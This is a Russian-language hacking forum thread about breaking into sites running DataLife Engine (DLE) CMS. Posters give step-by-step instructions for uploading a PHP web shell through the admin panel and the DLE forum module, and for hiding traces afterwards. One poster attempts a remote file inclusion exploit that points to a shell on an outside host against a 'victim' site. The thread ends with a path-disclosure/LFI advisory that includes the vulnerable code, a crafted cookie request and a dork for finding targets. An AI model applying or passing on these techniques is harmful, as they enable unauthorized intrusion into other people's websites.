Не знаю важно или нет , ну мне часто помогало...Если админ не поставил на шаблон достаточно прав , то через админку когда изменяешь шаблон пишет ошибку , я это обхожу с помощью создания нового шаблона , после того как создали новый шаблон его можно редактировать ;-) , в настройках системы выбераете тот шаблон который создали
вопрос как залить шелл через админку с возможностью его последующего запуска вопрос возник из-за того, что файл заливаемый через новости, фильтруется хц аксесом. А если в шаблон заливать, то скобки "<>" не обрабатываются ( Других явных вариантов тут не нашел и пока самому не пришли в голову... кто что знает?
Заходишь в "настройка системы" => "настройка загрузки файлов на сервер" => "Расширение файлов, допустимых к загрузке" дописываешь PHP. Потом "Добавить новость" там не чё не заполняем и новость не добавляем... просто "загрузка файлов на сервер" загружаешь значит свой шелл... он сохраняется в ...\uploads\files\десять цифр_название.php а потом пробиваешь на валидность... и еще https://damagelab.org/index.php?showtopic=16780&pid=103742&st=10&#entry103742
уже обсуждалось , много раз <FilesMatch "\.(avi|mp3|mp4|flv|swf|wmv)$|^$"> , так что , то что ты написал полная чушь C этого поржал этот тип тоже какую то ху**ню написал.
Если имеется установленный модуль DLE forum - то шелл залить проще простого, имея доступ в админку. Заходим в админку - другие разделы - настройка модуля DLE forum (/admin.php?mod=options&action=options) Настройка (/admin.php?mod=forum&action=tools) - таб "настройка загрузки файлов на сервер". В "Расширение файлов, допустимых к загрузке" дописываем ",php", сохраняем. Идем на форум, выбираем любую тему, нажимаем "ответить", в нвоом окне нажимает на значок папки (выше поля ввода сообщения). Там выбираем наш шелл в .PHP формате (.php обрезается самим движком). Грузим, вставляем в пост (аттачмент), постим. Видим в посте линк. переходим - вот и наш шелл. после этого можно залить наш шелл в другое место, удалить этот и стереть пост. Ну и, главное, не забыть в админке в настройках убрать добавленное разрешени PHP (с)WildShaman 2009
wildshaman, только что попробовал, не получилось. Скорее всего из-за ЧПУ. По-моему, оно должно быть отключено.
у мня проблема вот линк http://www.milw0rm.com/exploits/9572 там эксплоит www.site/path /engine/api/api.class.php?dle_config_api=[shell.txt?] вместо сайт я вставляю сайт жертвы (и знаю что там установлена такая же версия) эта строчко остается неизменная /engine/api/api.class.php?dle_config_api= и шелл Я загрузил на site narod.ru тоесть после config_api= я ввожу линк на свой сайт с шеллом пс убирал расширение ничего кто потскажет
http://site-na-dle.ru/engine/api/api.class.php?dle_config_api=http://site.narod.ru/.txt? так делал? с вопросом в конце.
я на разных сайтах смотрел wildshaman предположил что Эта бага есть только у версий,с качанных с сайта http://dlecms.com как по другому моно замутить
Раскрытие путей + LFI DataLife Engine <= 8.2 Тип: Раскрытие путей Автор: mailbrush Версия: DataLife Engine <= 8.2 Описание: Уязвимость заключается в отсутствии фильтрации входного параметра "dle_skin" в файле init.php и позволяет удалённому пользователю добиться вывода ошибки функции, соответственно увидев пути к корню сайта. Уязвимый код: /engine/init.php PHP: ... } elseif (isset($_COOKIE['dle_skin']) AND $_COOKIE['dle_skin'] != '') { if (@is_dir(ROOT_DIR.'/templates/'.$_COOKIE['dle_skin'])) { $config['skin'] = $_COOKIE['dle_skin']; } } ... $tpl->dir = ROOT_DIR.'/templates/'.$config['skin']; ... include_once $tpl->dir.'/login.tpl'; Эксплуатация: Заходим на сайт DLE. Открываем браузером менеджер куки. Изменяем / добавляем параметр, название которого ставим Code: dle_skin и значение Code: ../ Отправляем запрос на сайт: Code: GET / HTTP/1.1 Host: dle-news.ru Cookie: dle_skin=../ Cookie2: $Version=1 Connection: Close Самый простой вариант - используем мой скрипт: Code: http://mailbrush.eu/tools/dle.php После этого на сайте видим ошибку: [PATH] - это и есть раскрытие путей. Соображающие люди поймут как сделать из этого LFI. Дорк: Code: Powered by DataLife Engine
mailbrush Круто. Ухты! Можно даже залить шелл если в uploads/files залить свой login.tpl указывать dle_skin=../uploads/files/
